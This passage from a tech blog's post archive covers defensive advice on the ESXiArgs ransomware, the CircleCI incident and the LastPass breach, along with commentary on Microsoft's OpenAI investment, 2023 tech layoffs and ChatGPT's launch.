firewall ruleset set -r CIMSLP -e 0\nThird, review your network segmentation. ESXi management interfaces should be on dedicated management VLANs with strict access controls. If you can reach your hypervisor management plane from a user workstation, your segmentation needs work.\nFourth, verify your backups. 
Not \u0026ldquo;check that the backup job shows green\u0026rdquo; — actually test a restore. Make sure at least one copy of your VM backups is stored independently of the ESXi infrastructure.\nMy Take # This ransomware campaign isn\u0026rsquo;t sophisticated. It exploits a known vulnerability with an available patch, targets systems that shouldn\u0026rsquo;t be internet-accessible in the first place, and uses a relatively simple encryption approach. And yet it\u0026rsquo;s affecting thousands of organizations.\nThe lesson isn\u0026rsquo;t technical — it\u0026rsquo;s organizational. We need to treat hypervisor infrastructure with the same security rigor we apply to any other critical system. That means regular patching cycles, network segmentation, monitoring, and tested backup procedures. None of this is new advice, but clearly it bears repeating.\nIf there\u0026rsquo;s a silver lining, it\u0026rsquo;s that this incident might finally get some organizations to take hypervisor security seriously. But I suspect that in another two years, we\u0026rsquo;ll be having a very similar conversation about a different CVE. I\u0026rsquo;d love to be wrong about that.\n","date":"2 February 2023","externalUrl":null,"permalink":"/posts/230202-esxiargs-ransomware-vmware-esxi/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"A massive ransomware campaign is exploiting a two-year-old VMware ESXi vulnerability, and the scale of unpatched systems is alarming.","title":"ESXiArgs Ransomware — A Wake-Up Call for VMware Infrastructure","type":"posts"},{"content":"This week, Microsoft confirmed what had been rumored for weeks: a multiyear, multibillion-dollar investment in OpenAI, reported to be around $10 billion. As someone who\u0026rsquo;s been building on Azure since its early days, this isn\u0026rsquo;t just another enterprise partnership announcement. 
This is Microsoft fundamentally redefining what a cloud platform means.\nThe Strategic Chess Move # Let\u0026rsquo;s put this in perspective. Cloud computing has been a three-horse race for years — AWS, Azure, and Google Cloud — with each provider differentiating mainly on pricing, service breadth, and enterprise relationships. Microsoft just changed the game by making AI capabilities a core competitive moat rather than a feature checkbox.\nThe investment extends their existing relationship that started in 2019, but the scale is different this time. We\u0026rsquo;re talking about exclusive cloud provider status for OpenAI\u0026rsquo;s workloads, integration of OpenAI models into Azure\u0026rsquo;s AI services, and likely deep embedding of GPT technology across the entire Microsoft product suite. If you\u0026rsquo;re running workloads on Azure, you\u0026rsquo;re about to get access to capabilities that simply won\u0026rsquo;t be available on competing platforms — at least not in the same integrated form.\nWhat This Means for Azure Developers # For those of us building on Azure, the immediate practical impact centers around the Azure OpenAI Service, which has been in limited preview. Expect this to become generally available much faster now. The key advantage? You get GPT model access with Azure\u0026rsquo;s enterprise compliance, networking, and identity management baked in.\nI\u0026rsquo;ve been experimenting with the preview API for a few weeks now, and the integration is already surprisingly smooth. You authenticate with your existing Azure AD credentials, the endpoints sit inside your virtual network, and the data processing agreements align with what enterprises already have in place for Azure services. That last point matters enormously — I\u0026rsquo;ve seen multiple projects stall because legal teams couldn\u0026rsquo;t approve sending data to OpenAI\u0026rsquo;s public API.\nThe pricing model will be interesting to watch. 
Right now, OpenAI charges per token through their API. Microsoft will likely bundle AI capabilities into existing Azure tiers, which could dramatically change the economics of building AI-powered applications.\nThe Broader Industry Impact # What I find most significant is the signal this sends to the rest of the industry. Google has been developing large language models internally — their PaLM and LaMDA models are impressive — but they\u0026rsquo;ve been cautious about public deployment. Amazon has been relatively quiet on the generative AI front compared to its competitors. This investment forces both to accelerate their strategies.\nFor developers and architects, the message is clear: AI integration is moving from \u0026ldquo;nice-to-have experiment\u0026rdquo; to \u0026ldquo;core platform capability\u0026rdquo; across all major clouds. If you haven\u0026rsquo;t started evaluating how large language models fit into your application architecture, the window for leisurely exploration is closing.\nThe open-source community response will also be worth watching. There\u0026rsquo;s a legitimate concern that the most capable AI models are becoming increasingly concentrated among well-funded companies. The compute costs alone for training models at GPT\u0026rsquo;s scale run into hundreds of millions of dollars — a barrier that effectively excludes all but the largest players.\nInfrastructure Implications # From an infrastructure perspective, this investment will drive significant changes in how Azure\u0026rsquo;s data centers are configured. Training and serving large language models requires specialized GPU clusters, high-bandwidth interconnects, and enormous amounts of memory. Microsoft has already been building out this infrastructure, but $10 billion accelerates the timeline considerably.\nFor those of us designing systems, this means thinking about AI inference as a first-class infrastructure concern. Latency to the model endpoint matters. Data locality matters. 
Batching and caching strategies for model calls need the same attention we\u0026rsquo;ve historically given to database query optimization.\nI\u0026rsquo;ve already started sketching out patterns for how to integrate LLM calls into microservice architectures without creating performance bottlenecks. The key insight is treating model inference like any other external service dependency — with circuit breakers, fallbacks, and graceful degradation.\nMy Take # I\u0026rsquo;ve been through enough technology cycles to be skeptical of \u0026ldquo;this changes everything\u0026rdquo; narratives. But this one feels different. The investment isn\u0026rsquo;t speculative — ChatGPT has already demonstrated real utility that non-technical users can grasp immediately. Microsoft isn\u0026rsquo;t betting on a future that might not arrive; they\u0026rsquo;re doubling down on technology that\u0026rsquo;s already here.\nMy practical advice: start building internal expertise now. Set up an Azure OpenAI Service instance if you can get access, experiment with prompt engineering, and figure out where in your application stack natural language understanding actually solves real problems. 
Not every feature needs AI, but the features that do will become table stakes remarkably quickly.\nThe cloud wars just got a lot more interesting, and for once, it\u0026rsquo;s not about who has the cheapest virtual machines.\n","date":"26 January 2023","externalUrl":null,"permalink":"/posts/230126-microsoft-openai-ten-billion-investment/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Microsoft’s massive investment in OpenAI signals a fundamental shift in how cloud providers compete — and it’s not just about chatbots.","title":"Microsoft's $10 Billion OpenAI Bet — What It Means for the Cloud and AI Landscape","type":"posts"},{"content":"Multiple outlets including Semafor and Bloomberg are reporting that Microsoft is in advanced talks to invest $10 billion in OpenAI, the company behind ChatGPT and GPT-3. If the deal goes through as reported, it would be one of the largest investments in AI history and would firmly position Microsoft at the center of the generative AI revolution.\nThis isn\u0026rsquo;t coming from nowhere. Microsoft has been building its relationship with OpenAI since 2019, when it invested $1 billion and became OpenAI\u0026rsquo;s exclusive cloud provider. Azure powers OpenAI\u0026rsquo;s training and inference infrastructure. GitHub Copilot, powered by OpenAI\u0026rsquo;s Codex model, is already one of the most tangible AI developer tools on the market. But a $10 billion investment? That\u0026rsquo;s a different magnitude entirely.\nThe Strategic Logic # To understand why Microsoft would make this bet, look at the cloud landscape. AWS dominates with roughly 32% market share. Azure is second at around 22%. Google Cloud trails at about 10%. For years, these three have competed primarily on infrastructure features, pricing, and enterprise relationships.\nAI changes that competitive dynamic. 
If generative AI becomes a foundational layer that developers and businesses build on — and the explosive adoption of ChatGPT suggests it might — then the cloud provider with the best AI capabilities has a powerful differentiator. It\u0026rsquo;s not just about virtual machines and storage anymore; it\u0026rsquo;s about who has the most capable AI models and the best tools to deploy them.\nMicrosoft has been threading this needle carefully. Azure already offers OpenAI\u0026rsquo;s models through the Azure OpenAI Service, giving enterprise customers access to GPT-3 and other models with Azure\u0026rsquo;s security, compliance, and networking infrastructure. A deeper investment in OpenAI would strengthen this exclusive arrangement and potentially give Microsoft early or preferred access to future models.\nFrom Microsoft\u0026rsquo;s perspective, this is also about Office, Teams, Bing, and every other product in their portfolio. Imagine Word that can draft documents from bullet points, Excel that can generate formulas from natural language descriptions, or Teams that can summarize meetings and extract action items. These aren\u0026rsquo;t hypothetical — they\u0026rsquo;re the obvious applications of the technology OpenAI has demonstrated.\nWhat This Means for Developers # For the developer ecosystem, the implications are significant:\nAzure becomes the AI platform. If you want to build on OpenAI\u0026rsquo;s models with enterprise-grade infrastructure, Azure is the path. This could be a meaningful driver of cloud migration for companies that have been AWS-centric but want access to the best generative AI capabilities.\nGitHub Copilot is just the beginning. Microsoft owns GitHub, and OpenAI\u0026rsquo;s technology already powers Copilot. Expect this to deepen dramatically — not just code completion, but code review, documentation generation, test writing, and potentially architectural suggestions. 
The developer experience could change fundamentally.\nThe API economy around LLMs will explode. OpenAI\u0026rsquo;s API pricing is already accessible enough for startups to build on. With Microsoft\u0026rsquo;s deep pockets and distribution infrastructure behind it, we\u0026rsquo;re likely to see an entire ecosystem of AI-powered applications emerge — and the tools, frameworks, and best practices for building with LLMs will become critical developer skills.\nCompetition will intensify. Google has been notoriously cautious about releasing its AI capabilities publicly, despite having arguably comparable or superior technology (remember, the Transformer paper came from Google). This investment will likely force Google\u0026rsquo;s hand. Amazon is reportedly working on its own LLM strategy. The next year will see rapid expansion as multiple AI platforms compete for developer mindshare and enterprise adoption.\nThe Valuation Question # The reported deal structure is interesting. OpenAI was originally founded as a nonprofit, then created a \u0026ldquo;capped-profit\u0026rdquo; subsidiary. The reported $29 billion valuation implies enormous expected revenue from AI services. Right now, OpenAI\u0026rsquo;s revenue reportedly comes from API access and is growing rapidly, but $29 billion is a bet on future dominance, not current financials.\nThis raises questions about the sustainability of the current AI economics. Training large language models is extraordinarily expensive — GPT-3\u0026rsquo;s training reportedly cost millions in compute. GPT-4, whenever it arrives, will likely cost significantly more. The inference costs of running ChatGPT for millions of free users aren\u0026rsquo;t trivial either.\nMicrosoft\u0026rsquo;s Azure infrastructure partially solves this by providing compute at cost (or below cost, as a strategic investment). But the broader question remains: what\u0026rsquo;s the business model that justifies a $29 billion valuation? 
Enterprise API subscriptions? AI-powered features in Microsoft 365? A fundamental reshaping of search with AI? Perhaps all of the above.\nThe Open Source Wild Card # There\u0026rsquo;s another dimension worth watching: the open-source AI ecosystem. While OpenAI\u0026rsquo;s name includes \u0026ldquo;open,\u0026rdquo; their recent models have been increasingly closed. GPT-3 and ChatGPT are accessible only through APIs, not as downloadable models.\nMeanwhile, open-source alternatives are developing rapidly. Stability AI\u0026rsquo;s Stable Diffusion demonstrated that open-source models can compete with and even exceed proprietary ones in some domains. Meta released OPT-175B, and other open-weight models are emerging from various research labs. Hugging Face continues to build the infrastructure for open AI development.\nThe tension between proprietary AI (OpenAI/Microsoft) and open-source alternatives will be one of the defining dynamics of the next few years. For developers, this tension is actually beneficial — it means competition, choice, and continued innovation regardless of which approach wins.\nMy Take # Microsoft is making a massive, calculated bet that AI is the next platform shift — comparable to mobile, cloud, or the web itself. Given what we\u0026rsquo;ve seen from ChatGPT, I find it hard to argue that they\u0026rsquo;re wrong about the technology\u0026rsquo;s potential.\nWhat I\u0026rsquo;m watching carefully is the consolidation risk. If the most capable AI models are controlled by a handful of hyperscalers who also control the cloud infrastructure needed to run them, that creates a concentration of power that should give us pause. 
The best outcome for developers and users is one where capable AI models are available from multiple providers, including open-source options, with real competition on quality, pricing, and terms.\nFor now, the practical takeaway for developers is simple: invest time in understanding LLMs, prompt engineering, and how to build applications with AI capabilities. Regardless of who wins the corporate chess match, the technology is here to stay, and the demand for engineers who know how to work with it is going to be enormous.\nThe next few months will tell us a lot about where this is heading. A confirmed $10 billion investment would be a defining moment for the AI industry — and for the cloud landscape that underpins it.\n","date":"19 January 2023","externalUrl":null,"permalink":"/posts/230119-microsoft-openai-investment/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Reports indicate Microsoft is investing $10 billion in OpenAI. What this mega-deal means for the cloud landscape, AI development, and the rest of the industry.","title":"Microsoft's Reported $10 Billion OpenAI Bet — The Cloud AI Race Heats Up","type":"posts"},{"content":"The new year has barely started, and the tech layoff announcements are already piling up. Amazon confirmed 18,000 job cuts — the largest in the company\u0026rsquo;s history. Salesforce is cutting roughly 8,000 employees, about 10% of its workforce. These follow the November waves from Meta (11,000) and Twitter (roughly half the company). 
According to layoffs.fyi, over 150,000 tech workers were laid off in 2022, and January 2023 is already adding to that count rapidly.\nHaving lived through the dot-com bust, the 2008 financial crisis, and now this — I want to offer some perspective that goes beyond the headlines.\nWhat\u0026rsquo;s Actually Driving This # The narrative in the press is straightforward: \u0026ldquo;tech companies over-hired during the pandemic boom and are now correcting.\u0026rdquo; That\u0026rsquo;s partially true, but the reality is more nuanced.\nDuring 2020-2021, several things happened simultaneously. Interest rates were near zero, making capital essentially free. Digital adoption accelerated dramatically as the world went remote. Tech companies saw their growth metrics surge and, quite reasonably at the time, hired aggressively to capitalize on what they believed was a permanent shift.\nThe correction we\u0026rsquo;re seeing now is driven by multiple factors converging:\nRising interest rates: The Fed\u0026rsquo;s aggressive rate hikes have made capital expensive again. For growth-stage companies that were burning cash to acquire users, the math has changed fundamentally. Even profitable companies are feeling pressure as the era of cheap money ends.\nRevenue slowdown: Digital advertising — the core business model for Meta, Google, and many others — has slowed as the pandemic-era digital surge normalized and economic uncertainty made advertisers more cautious.\nEfficiency pressure: There\u0026rsquo;s increasing pressure from investors to focus on profitability over growth. Mark Zuckerberg has literally called 2023 the \u0026ldquo;Year of Efficiency.\u0026rdquo; After years of \u0026ldquo;grow at all costs,\u0026rdquo; the pendulum is swinging toward margins and operational discipline.\nCopycat dynamics: There\u0026rsquo;s an uncomfortable truth here: once a few major companies announce layoffs, it becomes easier for others to follow. 
It provides cover for workforce reductions that leadership may have been considering anyway. \u0026ldquo;Everyone is doing it\u0026rdquo; is a powerful normalizer.\nThe Developer Market Reality # Let me be clear: the tech job market has cooled, but it hasn\u0026rsquo;t collapsed. There\u0026rsquo;s an enormous difference between the current environment and the dot-com bust, where entire business models evaporated overnight and many companies simply ceased to exist.\nWhat we\u0026rsquo;re seeing is a correction from an abnormally hot market. In 2021-2022, the market was so tilted toward candidates that companies were offering signing bonuses, fully remote positions, and inflated compensation packages just to compete. That was an anomaly, not a baseline.\nThe companies doing layoffs are, for the most part, still enormously profitable or well-funded. Amazon\u0026rsquo;s core business is healthy. Salesforce isn\u0026rsquo;t going anywhere. These are cost optimization moves, not existential crises.\nThat said, the impact on affected individuals is real and significant. \u0026ldquo;The market is still okay on average\u0026rdquo; is cold comfort when you\u0026rsquo;re the one whose position was eliminated. The emotional and financial stress of a layoff is genuine regardless of macro conditions.\nWhat Areas Are More Resilient # Not all engineering roles are equally affected. From what I\u0026rsquo;m seeing across my network and in public reporting:\nMore affected: Recruiting (obviously, since you need fewer recruiters when you\u0026rsquo;re not hiring), some product management roles, roles in experimental or moonshot divisions, and unfortunately some diversity and inclusion programs.\nMore resilient: Core infrastructure and platform engineering, security, data engineering, and roles directly tied to revenue-generating products. Cloud infrastructure demand continues to grow. 
AI/ML teams, if anything, are expanding — the ChatGPT moment has every company scrambling to integrate AI capabilities.\nStrong demand: DevOps and SRE roles remain in high demand. The infrastructure underlying all these services still needs to be built, maintained, and improved. Cybersecurity continues to face a massive talent shortage that shows no signs of easing.\nLessons for Engineers # A few thoughts for developers navigating this environment:\nDiversify your skills. Full-stack engineers who can work across the stack and understand infrastructure are more versatile when headcount is constrained. If you\u0026rsquo;ve been meaning to learn Kubernetes, brush up on cloud architecture, or understand CI/CD pipelines more deeply — now is a good time.\nBuild your network before you need it. The developers who land quickly after layoffs are typically the ones with strong professional networks. Contribute to open source, participate in communities, maintain relationships with former colleagues. These connections matter more than any job board.\nSave aggressively. The tech compensation boom of the past few years provided an opportunity to build significant financial cushions. If you haven\u0026rsquo;t been taking advantage of that, start now. An emergency fund that covers 6-12 months of expenses turns a layoff from a crisis into an inconvenience.\nFocus on fundamentals. Frameworks and specific tools come and go. Understanding data structures, system design, distributed systems concepts, and how to write clean, maintainable code — these skills compound over decades. They also tend to be what separates candidates in a more selective hiring environment.\nMy Take # I\u0026rsquo;ve been through enough of these cycles to know that the tech industry will be fine in the aggregate. The demand for software isn\u0026rsquo;t decreasing — if anything, it\u0026rsquo;s accelerating as every industry continues to digitize. 
What\u0026rsquo;s changing is the financial environment that allowed companies to hire ahead of demand and tolerate high operational costs.\nWhat concerns me more than the layoffs themselves is the potential loss of institutional knowledge and the impact on engineering culture. When you lay off 10% of a company, you don\u0026rsquo;t just lose headcount — you lose the people who know why that system was built that way, who carry the context that makes large codebases manageable, who mentor junior engineers.\nFor those affected: this is a setback, not a dead end. The market for good engineers remains strong. Take the time you need, lean on your network, and remember that your worth isn\u0026rsquo;t defined by your employment status at any given moment.\nFor those not affected: check in on your former colleagues. Make introductions. Share job openings. The tech community is strongest when we support each other through the downturns, not just celebrate together during the booms.\n","date":"12 January 2023","externalUrl":null,"permalink":"/posts/230112-tech-layoffs-wave-2023/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Amazon, Salesforce, and others announce massive layoffs to start 2023. Looking at what’s driving this wave and what it means for software engineers.","title":"The 2023 Tech Layoff Wave — What It Means for the Industry","type":"posts"},{"content":"Happy New Year — now go rotate all your secrets. That\u0026rsquo;s the gist of the urgent notice CircleCI published yesterday, January 4th, advising all customers to immediately rotate any and all secrets stored in CircleCI. That includes environment variables, project-level API keys, and anything referenced in your pipeline configurations. 
This follows a pattern we\u0026rsquo;ve seen repeatedly where build and deployment infrastructure becomes a high-value attack surface.\nWhen a CI/CD platform tells you to rotate everything with that kind of urgency, without yet providing details on scope or impact, it\u0026rsquo;s time to take it seriously. And it raises some uncomfortable questions about how much trust we place in our build infrastructure.\nWhat We Know So Far # The details are sparse at this point. CircleCI\u0026rsquo;s advisory says they\u0026rsquo;re \u0026ldquo;currently investigating\u0026rdquo; a security incident and that out of \u0026ldquo;an abundance of caution\u0026rdquo; customers should rotate all secrets. They\u0026rsquo;ve also recommended reviewing internal logs for unauthorized access from December 21, 2022 through January 4, 2023.\nThat two-week window is concerning. It suggests that whatever happened may have given attackers access to customer data for an extended period. CircleCI is one of the most widely used CI/CD platforms in the industry — their customer base includes startups and enterprises alike. The potential blast radius is significant.\nOAuth tokens are another area of concern. If you\u0026rsquo;ve connected CircleCI to GitHub, Bitbucket, or other services via OAuth, those tokens could potentially have been exposed. CircleCI has stated they\u0026rsquo;ve already rotated Project API tokens and are working on additional mitigations.\nThe CI/CD Trust Problem # This incident highlights something I\u0026rsquo;ve been thinking about for years: CI/CD systems are some of the most privileged components in our infrastructure, yet they often receive less security scrutiny than production systems. 
The trend toward integrated CI/CD platforms like GitHub Actions concentrates this risk even further, making secure architecture even more critical.\nThink about what your CI/CD platform has access to:\nSource code for every project in your organization Deployment credentials for production environments API keys for third-party services Package registry tokens for publishing Cloud provider credentials for infrastructure provisioning Database connection strings for migrations and testing Your CI/CD platform is, in many ways, a skeleton key to your entire operation. If an attacker compromises it, they potentially have access to everything: your code, your infrastructure, your secrets, and your deployment pipeline. They could inject malicious code that gets deployed automatically through your trusted pipeline.\nThis isn\u0026rsquo;t a new concern. The SolarWinds attack demonstrated the devastating potential of compromised build systems in 2020. The Codecov bash uploader incident in 2021 showed how a single compromised CI component could exfiltrate secrets from thousands of organizations. 
And now CircleCI joins the list.\nPractical Response Steps # If your team uses CircleCI, here\u0026rsquo;s a prioritized action plan:\nImmediate (today):\nRotate all environment variables and secrets stored in CircleCI Rotate any OAuth tokens connected to CircleCI Review and rotate deployment credentials that CircleCI had access to Audit your CircleCI pipeline configs for any hardcoded secrets (you shouldn\u0026rsquo;t have any, but check) Short-term (this week):\nReview access logs for all systems that CircleCI had credentials for, looking for unusual activity since December 21 Check for any unexpected deployments or package publications during that window Review GitHub/Bitbucket audit logs for repository access patterns Consider whether any secrets that were exposed need further downstream rotation (e.g., if a database password was in CircleCI, rotate it and check for unauthorized access to that database) Medium-term:\nEvaluate your secrets management strategy — are you using a dedicated vault (HashiCorp Vault, AWS Secrets Manager) with short-lived credentials, or are you storing long-lived secrets directly in CI? Implement credential rotation automation so future incidents like this aren\u0026rsquo;t a manual fire drill Review whether you can reduce the privileges your CI/CD platform holds Rethinking CI/CD Security Architecture # This is a good moment to step back and think about how we architect CI/CD security. The traditional model — store secrets in the CI platform and reference them in pipeline configs — is convenient but creates exactly this kind of concentrated risk.\nBetter approaches exist:\nShort-lived credentials: Instead of storing permanent AWS access keys in CircleCI, use OIDC federation to get temporary credentials for each build. 
The credentials expire automatically, so even if they\u0026rsquo;re exfiltrated, the window of exposure is minutes rather than months.\nSecrets vaults with dynamic secrets: Tools like HashiCorp Vault can generate unique, short-lived credentials for each CI run. Even if an attacker captures them, they expire quickly and can be traced to specific builds.\nLeast privilege: Does your CI pipeline really need admin access to your AWS account? In many organizations, CI credentials are far more permissive than necessary. Tighten those IAM policies.\nBuild provenance and verification: SLSA (Supply-chain Levels for Software Artifacts) provides a framework for ensuring that software artifacts haven\u0026rsquo;t been tampered with during the build process. It\u0026rsquo;s still maturing, but the concepts are sound.\nMy Take # Every few months, we get another reminder that the software supply chain is a critical attack surface. SolarWinds, Codecov, the npm and PyPI package poisoning campaigns, and now CircleCI. The pattern is clear, and yet many organizations still treat CI/CD security as an afterthought.\nI\u0026rsquo;m not going to tell anyone to stop using CircleCI — breaches can happen to any platform, and what matters more is how they respond and what systemic changes they make. But I am going to say this: if your organization\u0026rsquo;s response to this incident is simply \u0026ldquo;rotate secrets and move on,\u0026rdquo; you\u0026rsquo;re missing the larger lesson.\nThe question isn\u0026rsquo;t \u0026ldquo;is CircleCI secure?\u0026rdquo; It\u0026rsquo;s \u0026ldquo;how much damage can any single compromised component do to our systems?\u0026rdquo; If the answer is \u0026ldquo;a lot,\u0026rdquo; that\u0026rsquo;s an architecture problem, not a vendor problem. 
Start minimizing that blast radius now, before the next incident gives you another urgent reason to.\n","date":"5 January 2023","externalUrl":null,"permalink":"/posts/230105-circleci-security-incident/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"CircleCI discloses a security incident and urges all customers to immediately rotate secrets stored in the platform. A reminder of the risks in our CI/CD supply chain.","title":"CircleCI's Security Incident — Rotate Your Secrets Now","type":"posts"},{"content":"It\u0026rsquo;s been roughly a month since OpenAI released ChatGPT, and I don\u0026rsquo;t think I\u0026rsquo;ve seen anything move this fast in the tech world since the early iPhone days. The numbers being reported are staggering — over a million users in the first five days. My LinkedIn feed, my team\u0026rsquo;s Slack channels, even conversations at family dinners over the holidays have been dominated by one question: \u0026ldquo;Have you tried ChatGPT?\u0026rdquo;\nI\u0026rsquo;ve been working in software for three decades now. I\u0026rsquo;ve seen plenty of \u0026ldquo;this changes everything\u0026rdquo; moments that turned out to be incremental improvements with good marketing. But this one feels qualitatively different, and I want to unpack why.\nThe Interface Breakthrough # The underlying technology — large language models, transformer architecture, reinforcement learning from human feedback (RLHF) — has been developing for years. GPT-3 launched in 2020. GitHub Copilot has been available since 2021. So why is ChatGPT the one that\u0026rsquo;s captured the public imagination?\nThe answer, I think, is the interface. OpenAI made a brilliant product decision by wrapping their model in a simple chat interface with no API keys, no setup, no technical prerequisites. You go to a website, type a question, and get an answer. The barrier to entry is essentially zero. 
This accessibility would prove foundational to how modern AI assistants like Claude eventually reached broader audiences.\nThis matters enormously. GPT-3 was arguably more flexible, but you needed to understand prompting, work with an API, or use a playground that felt like a developer tool. ChatGPT feels like talking to someone knowledgeable. That conversational framing — the way it maintains context across a conversation, admits when it\u0026rsquo;s wrong, and asks clarifying questions — makes it accessible to anyone.\nWhat It\u0026rsquo;s Good At (And What It\u0026rsquo;s Not) # I\u0026rsquo;ve been experimenting with ChatGPT extensively over the past few weeks, particularly for development tasks. Here\u0026rsquo;s where I see genuine utility:\nCode explanation and debugging: Paste in a confusing piece of code, ask what it does, and you\u0026rsquo;ll get a surprisingly coherent explanation. I\u0026rsquo;ve found it particularly useful for understanding unfamiliar codebases or libraries.\nBoilerplate generation: Need a basic Express.js server setup, a Docker Compose file, or a GitHub Actions workflow? ChatGPT can generate reasonable starting points. It won\u0026rsquo;t replace understanding what the code does, but it can save you the tedious scaffolding work.\nWriting documentation: First drafts of READMEs, API docs, and code comments. It needs editing, but the raw output is often a solid starting point.\nWhere it falls short is equally important to understand:\nAccuracy and hallucination: ChatGPT confidently generates plausible-sounding but incorrect information. It will cite papers that don\u0026rsquo;t exist, reference API methods that were never implemented, and present outdated information as current. 
You cannot trust its output without verification.\nComplex reasoning: Multi-step logical problems, nuanced architectural decisions, and anything requiring genuine understanding of trade-offs — these are areas where the model\u0026rsquo;s pattern matching breaks down. It can parrot best practices but can\u0026rsquo;t reason about why they\u0026rsquo;re best practices in your specific context.\nCurrent knowledge: The training data has a cutoff, so it doesn\u0026rsquo;t know about recent library versions, new APIs, or current best practices for rapidly evolving tools.\nThe Developer Tooling Implications # What interests me most about ChatGPT is what it signals for developer tooling. GitHub Copilot already showed that LLMs could be useful code completion tools. ChatGPT demonstrates that the conversational interaction model can make AI assistance feel natural and productive.\nI expect 2023 to bring an explosion of AI-powered developer tools. Code review assistants, documentation generators, test case suggesters, architecture advisors — the potential applications are enormous. This evolution continued through GitHub Copilot\u0026rsquo;s agent mode and broader AI-assisted testing implementations. The question isn\u0026rsquo;t whether these tools will exist, but how quickly they\u0026rsquo;ll mature and how well they\u0026rsquo;ll integrate into existing workflows.\nThe teams and companies that figure out how to effectively use these tools will have a real productivity advantage. Not because AI will write their code for them, but because it will handle the routine work that consumes so much of a developer\u0026rsquo;s day — the boilerplate, the documentation, the \u0026ldquo;how do I do X in framework Y\u0026rdquo; searches.\nThe Concerns Are Real # I\u0026rsquo;d be remiss not to mention the legitimate concerns. The potential for AI-generated misinformation is significant. 
Students are already using ChatGPT to write essays, which raises questions about education and assessment. The copyright implications of models trained on vast amounts of internet text are still being debated and litigated.\nFor developers specifically, there\u0026rsquo;s the question of code quality and security. If teams start accepting AI-generated code without thorough review, we could see a wave of subtle bugs and vulnerabilities introduced at scale. The code ChatGPT generates works in isolation but doesn\u0026rsquo;t always account for edge cases, error handling, or security implications.\nThere\u0026rsquo;s also the competitive landscape to consider. OpenAI has a significant head start, but Google, Meta, and others have their own large language models. How this market evolves — and whether it consolidates or fragments — will shape the tools available to us.\nMy Take # I\u0026rsquo;ll be honest: I\u0026rsquo;m cautiously optimistic about where this is heading. ChatGPT isn\u0026rsquo;t going to replace developers — the model doesn\u0026rsquo;t understand software engineering, it generates text that looks like software engineering. But as an augmentation tool, as a way to accelerate the mundane parts of our work, it has genuine potential.\nWhat I\u0026rsquo;d recommend to every developer: spend time with ChatGPT now. Understand its capabilities and limitations firsthand. The journey from simple chat to sophisticated AI coding assistants shows how quickly these tools matured. Don\u0026rsquo;t wait for the polished tools that will inevitably follow — build your intuition for what these models can and can\u0026rsquo;t do. That intuition will be valuable regardless of which specific tools win in the market.\nWe\u0026rsquo;re at the beginning of something significant. Not the end of programming, but possibly the beginning of a new era in how we interact with computers and build software. The emergence of agent-based systems represents this evolution. 
The next few months are going to be fascinating to watch.\n","date":"29 December 2022","externalUrl":null,"permalink":"/posts/221229-chatgpt-explosive-first-month/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"One month after launch, ChatGPT has crossed a million users and sparked conversations about AI that reach far beyond the usual tech circles. Here’s why this one matters.","title":"ChatGPT's First Month — Why This AI Moment Feels Different","type":"posts"},{"content":"Just before the holidays, LastPass dropped what might be the most devastating breach disclosure of the year. In an updated blog post, the company revealed that the August 2022 breach was far worse than initially reported: attackers obtained copies of customer vault data, including encrypted password vaults and unencrypted metadata like website URLs.\nFor a company whose entire value proposition is \u0026ldquo;we keep your passwords safe,\u0026rdquo; this is about as bad as it gets. And the way this disclosure has been drip-fed over months makes it even more concerning.\nThe Anatomy of a Cascading Breach # Let\u0026rsquo;s piece together what happened. Back in August, LastPass disclosed that an unauthorized party gained access to their development environment through a compromised developer account. At the time, they assured users that no customer data or encrypted vaults were accessed.\nThen in November, they updated the disclosure: the attacker had used information stolen from the development environment to target an employee and obtain credentials to access cloud storage. Now, in December, we learn the full picture — the attacker copied customer vault backup data from that cloud storage.\nThis is a textbook example of lateral movement. The attacker didn\u0026rsquo;t need to breach the production vault infrastructure directly. Similar supply chain security breaches have revealed how development environment access can cascade into severe compromises. 
They found a path through the development environment, pivoted to cloud storage credentials, and walked away with the crown jewels. It\u0026rsquo;s the kind of attack chain that security teams model in threat assessments but hope never materializes.\nWhat\u0026rsquo;s Actually at Risk # LastPass is emphasizing that the vault data is encrypted with AES-256 and can only be decrypted with the user\u0026rsquo;s master password. Technically, that\u0026rsquo;s true. But there are several problems with treating this as reassurance.\nFirst, not everything in the vault is encrypted. Website URLs, for instance, are stored as unencrypted metadata. This means attackers can see which services you use — your bank, your email provider, your employer\u0026rsquo;s VPN. That\u0026rsquo;s valuable intelligence for targeted phishing.\nSecond, the security of the encrypted data depends entirely on the strength of the master password. Users who chose weak master passwords — and there are inevitably many — face a real risk of brute-force attacks. LastPass has improved their default PBKDF2 iteration count over the years, but older accounts that haven\u0026rsquo;t updated their settings may be using far fewer iterations, making offline cracking significantly faster.\nThird, this data doesn\u0026rsquo;t expire. Unlike a stolen session token or even a leaked credit card number, an encrypted vault backup is a time bomb. Attackers can hold onto it and crack it over months or years as compute costs decrease.\nThe Trust Problem # I\u0026rsquo;ve been in this industry long enough to know that breaches happen. Every company of sufficient size will eventually face one. What matters is how you handle it, how your architecture limits blast radius, and how transparent you are with affected users.\nLastPass has struggled on all three counts. The August-to-December drip-feed of increasingly bad news erodes trust more than a single comprehensive disclosure would have. 
The architecture question — why were vault backups accessible through a path that started with a developer account — is one that will take time to fully answer. Later zero-day supply chain incidents would highlight continued challenges in securing development infrastructure. And the communication, while technically accurate, has consistently downplayed severity.\nFor those of us who advocate for password managers (and I still do — they\u0026rsquo;re better than the alternative for most people), this is a painful moment. The security community has spent years convincing non-technical users that password managers are worth trusting. One incident like this can undo a lot of that work.\nWhat Should Affected Users Do # If you\u0026rsquo;re a LastPass user, here\u0026rsquo;s the pragmatic advice:\nChange your master password immediately, and make it long and unique. A passphrase of 4-5 random words is ideal. Assume the unencrypted metadata is known. Be extra vigilant about phishing attempts that reference specific services you use. Prioritize rotating passwords for your most sensitive accounts — banking, email, anything that could be used for further account recovery. Enable MFA everywhere you haven\u0026rsquo;t already. Even if a password is cracked, MFA provides a second barrier. Consider migrating to another password manager. Not because all alternatives are inherently more secure, but because the trust relationship with LastPass is damaged. My Take # The LastPass situation is a stark reminder that security isn\u0026rsquo;t just about encryption algorithms — it\u0026rsquo;s about the entire system: architecture, access controls, monitoring, incident response, and communication. AES-256 is 